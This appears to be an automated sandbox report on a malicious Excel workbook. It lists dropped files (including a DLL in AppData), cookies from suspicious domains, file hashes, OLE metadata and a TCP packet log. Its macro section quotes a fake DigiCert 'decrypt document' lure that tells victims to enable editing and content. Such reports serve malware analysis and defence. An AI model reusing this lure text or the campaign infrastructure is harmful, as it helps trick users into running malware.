C:\Users\user\AppData\Roaming\Ekduh\mae.dll Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	279040
Entropy (8bit):	6.822417966790041
Encrypted:	false
SSDEEP:	6144:1/oqv+z4/KDhYxNzQkR6sfPliEC3iNEt0Filb0ilBQY+Wj:1/dv+z45QkRZfPlTC3iNbFcoiTbj
MD5:	7CFF1113D30B8E4CD51BA13F40B9D2D5
SHA1:	6A0B90E9B0861CB42FECD217651D25C2E9EABF7D
SHA-256:	5C0F9C9BABC640A2578B1D3E8CACB60DF32A0437EF3F9383D00ED88A7CEF3A62
SHA-512:	2A9420971587E2234DB54A5008C9A861C337DFCBEB94698FD04A5E0481794F5CC510D81A6548BBB9F0B2A024A31D46A954768A0E8F6B0DD19CF7602A284D4862
Malicious:	false
Joe Sandbox View:	Filename: case (61).xls, Detection: malicious, Browse Filename: case (61).xls, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e\|.6!..e!..e!..e,O;e;..e,O.e6..e,O:eJ..e...e$..e!..en..e,O?e ..e,O.e ..e,O.e ..e,O.e ..eRich!..e........PE..L...r..T...........!.....b...v.......$....................................................@.............................s...D...P....... .......................<...p...8...............................@............... ............................text....a.......b.................. ..`.rdata...............f..............@..@.data....... ......................@....rsrc... ...........................@..@.reloc..<............*..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat Jan 23 00:24:43 2021, atime=Sat Jan 23 00:24:43 2021, length=8192, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.479844394013876
Encrypted:	false
SSDEEP:	12:85Q4CLgXg/XAlCPCHaXgzB8IB/KEMlXX+Wnicvb4+bDtZ3YilMMEpxRljKFTdJP8:85HU/XTwz6IsYelDv3qcrNru/
MD5:	51F0C3F15983BAA6E6FF1194CC2AA303
SHA1:	1653F28BF1730E18683ACCE3072B9B6D8CA6D0E2
SHA-256:	E001C3E37E1EE18D17343580495B825D2DE75C57B8AB42415BB06495785CBB19
SHA-512:	82DDB84E171DBC6DFE1B8CEE8BE18A996FAA8145AD14C1AD6BCC904DD19ADDB058C244B8CC5214EF66E732241E8D9E720B0264622E60BC4D7ABB7668DE5E1B5E
Malicious:	false
Reputation:	low
Preview:	L..................F...........7G....J.&.....J.&.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1.....7R....Desktop.d......QK.X7R....._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\468325\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......468325..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\case (426).LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Sat Jan 23 00:24:43 2021, atime=Sat Jan 23 00:24:43 2021, length=99328, window=hide
Category:	dropped
Size (bytes):	4056
Entropy (8bit):	4.541703271119695
Encrypted:	false
SSDEEP:	96:8/u/XLIk9cQh2/u/XLIk9cQh2g/XLIk9cQh2g/XLIk9cQ/:8/0Ik+QE/0Ik+QECIk+QECIk+Q/
MD5:	3033A93FB851CCB268292D5734C4001F
SHA1:	9908467F574374B45AFA5A521762E57AB2A86901
SHA-256:	12575CA342BBFA78D2FD2FE0DF385446584D4E08233E4C0AFC68F789DE7709C8
SHA-512:	0B59BB08B283FC0DE782DA4779D5B68FD9DBB35EE5E374E7D79CA9F27FADF4DEF44E60A6ACCB8C08AF6F90A2712D9302E73FE613D6B3EC314F9939A260EF84C4
Malicious:	false
Reputation:	low
Preview:	L..................F.... .....>..{....J.&.....Q.&................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..d..7R.. .CASE(4~1.XLS..J.......Q.y.Q.y...8.....................c.a.s.e. .(.4.2.6.)...x.l.s.......x...............-...8...[............?J......C:\Users\..#...................\\468325\Users.user\Desktop\case (426).xls.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.a.s.e. .(.4.2.6.)...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......468325..........D_....3N...W...9F.C...........[D_....3N...W...9F.C..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	169
Entropy (8bit):	4.523539047754448
Encrypted:	false
SSDEEP:	3:oyBVomMFTkCeIBTkCmMFTkCeIBTkCmMFTkCeIBTkCmMFTkCv:dj6FTkuTkUFTkuTkUFTkuTkUFTks
MD5:	DC5AC9334FFFA95B53EB0314F94E8D56
SHA1:	72F597BCFDCF6D865C1FD12E52148A81D7ED437E
SHA-256:	893A68DDD86380CADE09D67520CD80B5BAF6AB6486EEB489916D1B0BA8FFB610
SHA-512:	82F05C9ECF432DCCAA3B4C980025882203874537240C18A1B53E28A534A9BC8A5C09E299FBF76F252AF8A40C66A873BF0649983FA1FE4239DB62553416D00853
Malicious:	false
Reputation:	low
Preview:	Desktop.LNK=0..[xls]..case (426).LNK=0..case (426).LNK=0..[xls]..case (426).LNK=0..case (426).LNK=0..[xls]..case (426).LNK=0..case (426).LNK=0..[xls]..case (426).LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\5SZSUZ8C.txt Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	120
Entropy (8bit):	4.595363481854301
Encrypted:	false
SSDEEP:	3:GmM/iRTHS15rUsAjEYVUvGOqN0jnwVdNMfSctd2TevX:XM/AQrYEY4GOYIngd29sTevX
MD5:	4497F0CAEC938A5CB300D5027BDDA8FB
SHA1:	E4A8E5C97537A5175810351E7BA4D3F7CD033B3A
SHA-256:	35A0401DE591B2C11DC475DFB1EFD185D93244A62227C2A9A68CF8A4F8F8351F
SHA-512:	0706C92E741680A17720ACF78AE6ADE85E2E82F7B255D3B28498778C27274EE7B473F85B118F4ED1E845BAEC60925A464F131CE2CF929528654D285C4CFC8FC2
Malicious:	false
Reputation:	low
IE Cache URL:	conssapratigdevi.tk/
Preview:	__cfduid.d7446b7a9c7f1bbc1b21ec4f298bfa1dd1611332747.conssapratigdevi.tk/.9728.899856256.30869614.1316790178.30863655.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\G4DNXBI9.txt Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	115
Entropy (8bit):	4.4488182601766315
Encrypted:	false
SSDEEP:	3:GmM/kytTGdHYirk5WVvEoHdcSNcSQqVdNMlytuTevX:XM/kytKd4r5uE7jud2gyevX
MD5:	D9DB315457A453FA69A06A56CF8CF1A6
SHA1:	1F72464BAEAE14B2C90F4A149D0468500B57667B
SHA-256:	0CC608B3D99FFECAB06ABBC37D6ED5A0A5A7665238AA7C9E9DD086F539804ED8
SHA-512:	7411FFD908213EC20D7CBB9CA5140C5BA31336A7B9D47B24E2AA3FA4D813983413C5D26966B184DBE0087C045BF431DEBA791C7AE14572B0B8FA67FBDAA1BB5A
Malicious:	false
Reputation:	low
IE Cache URL:	forteanhub.com/
Preview:	__cfduid.d8f7b043b90a25591c8ba97dfd39292d41611332746.forteanhub.com/.9728.889856256.30869614.1308834164.30863655.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Y5D8BEZV.txt Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text
Category:	downloaded
Size (bytes):	118
Entropy (8bit):	4.504081946579558
Encrypted:	false
SSDEEP:	3:GmM/xkJTCUdn/EITUUWmX+RofvcSNumVdNPCcSxagvXn:XM/xaTXJTUuufsdJW
MD5:	7C4A13B5631BD675F465121BAB7C39C9
SHA1:	582BECB22AAB725C274D881ACEBE2F29FF4A464F
SHA-256:	2447E6D04914DE6CB45D9A5231C61C454FD7059CF09C872EDBD926998C828A86
SHA-512:	178EA0DF5D12058F9FAD27845D1AC2C8F3A6EFAE5BF0016685232D3AA4E84532D1834732AD736CB9C18CBD948AA8D0EE7268CC5531EC57CBA274B8FFC296AEE8
Malicious:	false
Reputation:	low
IE Cache URL:	fortnitehecks.com/
Preview:	__cfduid.d9e66896de3d0112fd17a18ef5a40a4af1611332713.fortnitehecks.com/.9728.559856256.30869614.2279796882.30863654.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YDNW2LFN.txt Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	117
Entropy (8bit):	4.487296388526255
Encrypted:	false
SSDEEP:	3:GmM/nzDQHDpNU5tvUCqRvcSNETXbVdNMMQZvX:XM/nzDYNU5dU5EDxd2fvX
MD5:	E10640E5A8AB6280FBD0D79941F7E49A
SHA1:	3666170CF2F8CED2A05047CE6F1E119039F9E892
SHA-256:	36A925D421B2BAF49E2616564C1CDEF5279916051C01718ACF0990ED1634580E
SHA-512:	AC9C5E9877B1A5E99A850902892F7AE9160CF135E8AD509616D93ECEB7C695D30FB12F1B332307CE56BD864E4D3E8FF5C910BA46D3396743418696AB85E8490B
Malicious:	false
IE Cache URL:	groceryasian.com/
Preview:	__cfduid.d71d0d15ff5b71e2096e72fffd67231da1611332745.groceryasian.com/.9728.879856256.30869614.1297914145.30863655.*.

C:\Users\user\Desktop\73EE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	173169
Entropy (8bit):	7.741164468776627
Encrypted:	false
SSDEEP:	3072:lhC3ejP8SGBRy9MFTOA/qvWPAOhMHy9MFVONOhMkgeQ7OhMqeQ9k8fz3Kk2KN1ee:zSej8p+MRC05nM1lPG0FrqKNA0FrixS/
MD5:	52F4C17AB5224A11A42E86C7E9DC476B
SHA1:	FA6CD4B12CEA3922B6A8F594D40D220BF4928510
SHA-256:	A6ECFEE32E165E96D58D9DB2D24DD12231B1C4D0EF1A5375FE3660EC146416B8
SHA-512:	029F075C5437F2FFCA7B1198DF29E90F4B417D922A384426FF4B0DED87D7926D70EE6FEE4FC6D388F6D7301C5135C29969908FA1C2974C3137CB9845EC46FB4D
Malicious:	false
Preview:	........g2........../.........v.......`......~:gV.V.y.Z./.. L..hr.O\.B,.+o...........g2........../.6.......v.......`......~:gV.V.y.Z./.. L..hr.O\.B,.+o.............BB....\.p..c..\|.B...rk.....$B..s..9..q....x........tSo.O$.E.Q)O>x.-\|.f..b..mZJr....._.......Go..@...5.`y............s..xB...S.a...(6....=.@....B(..(tO6....p.6.C\|"....s.....Z.\|.....f ...b.4/.....Ygh.<.....N....i.....H,....\|............=...o.79%.T.88........@..........."...w.....F....7......{1.........{.cL<fr..V.....BR5.B.o..1....P.c..~.^Z..:...JI.....{.XN..\|1...N+y.,(......z........ ..b...!1.....sn.n.Xv.W.2.......%xO...}..1....PX.A.J......2...6.)..Yt.. /1...#.<G...../t0.....rc.H....{`..1.....u=..&9.l.$<.H.....d...W..v1.......(.LU...>..%e.T......}3\.H..Uf9...1....3.ws'@.c......[X.8...}...JW1...k..SB.+.w....nS.]..Y....M.1......v......3pz.Y.)YK........;..1...?Z3.T..M....B.9. .<`..o...b...1.(......`...np.v....P..M:^......>.k......1.(.l.,]..X.....oYBY4.........,F&?..*.EZ.1...A...}..i.t.G...QNsL. ...

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: , Last Saved By: , Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Apr 23 13:26:24 2020, Last Saved Time/Date: Thu Jan 21 23:11:28 2021, Security: 1
Entropy (8bit):	6.453701095973029
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	case (426).xls
File size:	156672
MD5:	b39a1365b5ba8cb5ed52942148636bf1
SHA1:	189509ee51aae87f21188cf75c1785207a92ec54
SHA256:	7847c9c6eae9fb7ca70174ed2092cd46f3d8b5c3172a980446aecf0d28961430
SHA512:	6d5dfdbe702f8627f8045f5854cf496a01150ff941792065850b75a77ce1b550e9a70450138ec4fa7b148d1e4dce1b96861e4c1cf525878179a18f2a6d114411
SSDEEP:	3072:xppdLdTb2doqmdPc2drdY0d6fAsls68Lm:xppZdb2Fmlc2hBcfAsls6H
File Content Preview:	........................>.......................0...........................-......./..........................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "case (426).xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Summary
Code Page:	1251
Author:
Last Saved By:
Create Time:	2020-04-23 12:26:24
Last Saved Time:	2021-01-21 23:11:28
Creating Application:	Microsoft Excel
Security:	1

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.838769798021
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . ( . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j S R F q S o B P w O . . . . . M a c r o 2 . . . . . M a c r o 3 . . . . . M a c r o 4 . . . . . M a c r o 5 . . . . . M a c r o 6 . . . . . M a c r o 7 . . . . . M a c r o 8 . . . . . M a c r o 9 . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 28 02 00 00 06 00 00 00 01 00 00 00 38 00 00 00 0f 00 00 00 40 00 00 00 0b 00 00 00 4c 00 00 00 10 00 00 00 54 00 00 00 0d 00 00 00 5c 00 00 00 0c 00 00 00 e7 01 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 00 00 00 00 0b 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.329149249915
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . g j . . . @ . . . . P 2 . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 b0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 60 00 00 00 12 00 00 00 78 00 00 00 0c 00 00 00 90 00 00 00 0d 00 00 00 9c 00 00 00 13 00 00 00 a8 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 10 00 00 00

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 145744

General
Stream Path:	Book
File Type:	Applesoft BASIC program data, first line number 8
Stream Size:	145744
Entropy:	6.58037994076
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . T . . / . . . Y . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . n * F . . . . . N 1 . : d = j . . K . . O 2 m ( . . m . . . . . h + . . . . . . f . m . d . j . . . o . . . . . f . m . d . j . . . o . . . . . f . m . d . j . . . o . . . . . f . m . d . j . . . o . . . . . f . m . d . j B . . . b c . . . . . ` . . . . . k . . . . C ~ j . . . . x . R . . * . . . . ! . . i . @ . n . . . k . . . . % % . . . ` . n . . . k . . . . . b . . . . . . . . . . . > . . . . . . 9 = . . . x .
Data Raw:	09 08 08 00 00 05 05 00 0a 54 cd 07 2f 00 04 00 59 b3 0a 9a e1 00 00 00 c1 00 02 00 94 04 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 f0 6e 2a 46 14 ef 9b e7 ef 4e 31 a4 3a 64 3d 6a bd c9 4b 86 d4 4f 32 6d 28 8f d3 6d fc cc d6 a0 b9 68 2b 05 9e e6 1a e7 01 66 1a 6d 92 64 9c 6a 90 00 83 6f 9e e6 1a e7 01 66 1a 6d 92 64 9c 6a 90 00 83 6f 9e e6 1a e7 01 66 1a 6d 92 64 9c 6a 90 00

Macro 4.0 Code

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,   FOLLOW THIS STEPS TO DECRYPT DOCUMENT ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"     1.Read the privacy policy  www.digicert.com/faq/.",,,,,,,,,,,,,,,,,,,,,,,,,,,,    2. ?li?k ?'!n?b!l? ?diting  on the yellow bar if the document was downloaded from the Internet.,,,,,,,,,,,,,,,,,,,,,,,,,,,,    3.  Click ?n?!ble c?nt?nt on the yellow bar to run plugin Core decryption.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                           PKI SYSTEM DOCUMENT PROTECTION,,,,,                                                                                           ,,,"2021 D'igiCert, Inc. All rights reserved.                                                                                             ",,,,,,,,ID: e087707be4830feba9,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,by AsHkERE ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 22, 2021 17:25:13.547060966 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:13.587282896 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:13.587414026 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:13.604182005 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:13.644473076 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:13.650724888 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:13.650782108 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:13.650846958 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:13.650877953 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:13.667596102 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:13.707772017 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:13.709415913 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:13.709506035 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:13.922421932 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:13.967436075 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.126091957 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.126194000 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.126259089 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.126308918 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.126353979 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.126375914 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.126420975 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.126427889 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.126440048 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.126447916 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.126503944 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.126543999 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.126566887 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.126569986 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.126662970 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.126703024 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.126729965 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.126769066 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.126777887 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.126795053 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.126847982 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.126885891 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.126919985 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.126962900 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.126971006 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.126992941 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.126995087 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.127027988 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.127053976 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.144295931 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.149959087 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.150002956 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.150226116 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.193583965 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.193651915 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.193684101 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.193715096 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.193747044 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.193784952 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.193824053 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.193871975 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.193916082 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.193917036 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.193929911 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.193945885 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.193979979 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.193989038 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.194010019 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.194029093 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.194042921 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.194078922 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.194098949 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.194122076 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.194135904 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.194160938 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.194179058 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.194190979 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.194216013 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.194228888 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.194231033 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.194237947 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.194266081 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.194284916 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.194304943 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.194318056 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.194344044 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.194361925 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.194392920 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.194399118 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.194434881 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.194449902 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.194473982 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.194492102 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.194503069 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.194530010 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.194569111 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.195905924 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.210644007 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.210704088 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.210735083 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.210756063 CET	443	49165	104.21.23.220	192.168.2.22
